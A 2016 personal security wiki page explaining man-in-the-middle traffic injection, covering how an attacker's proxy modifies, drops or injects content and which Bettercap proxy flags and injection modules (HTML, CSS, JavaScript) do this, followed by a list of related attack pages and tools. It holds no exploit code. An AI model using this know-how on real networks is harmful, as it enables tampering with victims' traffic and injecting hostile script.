MITM/Traffic Injection

From charlesreid1

Revision as of 20:27, 22 August 2016 by Admin (talk | contribs)

What is traffic injection?

The term "traffic injection," in the context of a Man in the Middle attack, refers to any situation where the attacker is conducting a man in the middle attack and is actively modifying traffic passing between the sheep and the gateway.

This can take many forms, of course:

  • Attacker can modify traffic from gateway to sheep, or from sheep to gateway
  • Attacker can selectively drop packets for denial of service of certain protocols/content
  • Attacker can perform search/replace on traffic (e.g., replace all images with other images)
  • Attacker can inject things into traffic, e.g., particular content, javascript/css files, etc.

How traffic injection works

Typically, the way this works is, a man in the middle attacker will set up an HTTP and/or HTTPS proxy server. On one side of the proxy server is the sheep, and on the other side of the proxy server is the client. As traffic from the sheep enters the proxy server, it is passed through any traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the gateway. Likewise, as traffic from the gateway enters the proxy server, it is passed through different traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the sheep.

This gives the attacker control of traffic. The different forms of traffic injection (modification, selective drops, search/replace, etc) take the form of different filters that the attacker writes and drops into the proxy server.

Implementation

To actually implement a traffic injection attack, you can use the Bettercap tool to perform a man in the middle attack. Bettercap implements a built-in http and https proxy, which allows you to execute a man-in-the-middle attack and perform traffic injection/modification attacks on the fly, all in one tool. Bettercap can also interface with another non-Bettercap proxy program.

To implement various filters in the proxy, you use Ruby, the language in which Bettercap is implemented.

bettercap proxy

bettercap has a --proxy and --proxy-port option to enable the proxy and set the port it uses.

Once you enable the proxy, you'll also want to pick a proxy module using the --proxy-module flag - proxy modules are the filters you're writing and dropping into your proxy filter. These filters are written in Ruby, and there are three existing modules: injecthtml, injectcss. injectjs.

Note: You can also specify non-standard (non-80) HTTP ports using --http-ports flag.

Flags


Defcon.png
monkey in the middle attacks
in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker.

MITM

Wireless Attacks: MITM/Wireless

Wired Attacks: MITM/Wired


Layer 1 and 2 MITM Attacks:

MITM/Layer 1 and 2

Network Tap: MITM/Wired/Network Tap

Evil Twin Attack: Evil Twin  · MITM/Evil Twin


Layer 3 and 4 MITM Attacks:

MITM/Layer 3 and 4

Traffic Sniffing: MITM/Sniffing

ARP Poisoning: MITM/ARP Poisoning

Traffic Injection/Modification: MITM/Traffic Injection

DNS Attacks: MITM/DNS  · Bettercap/Failed DNS Spoofing Attack  · Bettercap/Failed DNS Spoofing Attack 2

DHCP Attacks: MITM/DHCP

WPAD MITM Attack: MITM/WPAD

Port Stealing: MITM/Port Stealing

Rushing Attack: MITM/Rushing Attack

Attacking HTTPS: MITM/HTTPS


Layer 5 MITM Attacks:

Session Hijacking: MITM/Session Hijacking


Toolz:

Ettercap  · Bettercap  · MITMf  · EvilFOCA

Wireshark  · Aircrack

Dsniff  · Arpspoof  · Dnsspoof

SSLSniff  · SSLStrip  · Frankencert

Driftnet  · Karma


MITM Labs: {{MITMLabs}}


Category:MITM  · Category:Attacks  · Category:Kali Attack Layers

Template:MITMLabs  · Template:MITMFlag

Flags  · Template:MITMFlag  · e




Retrieved from "https://charlesreid1.com/w/index.php?title=MITM/Traffic_Injection&oldid=13085"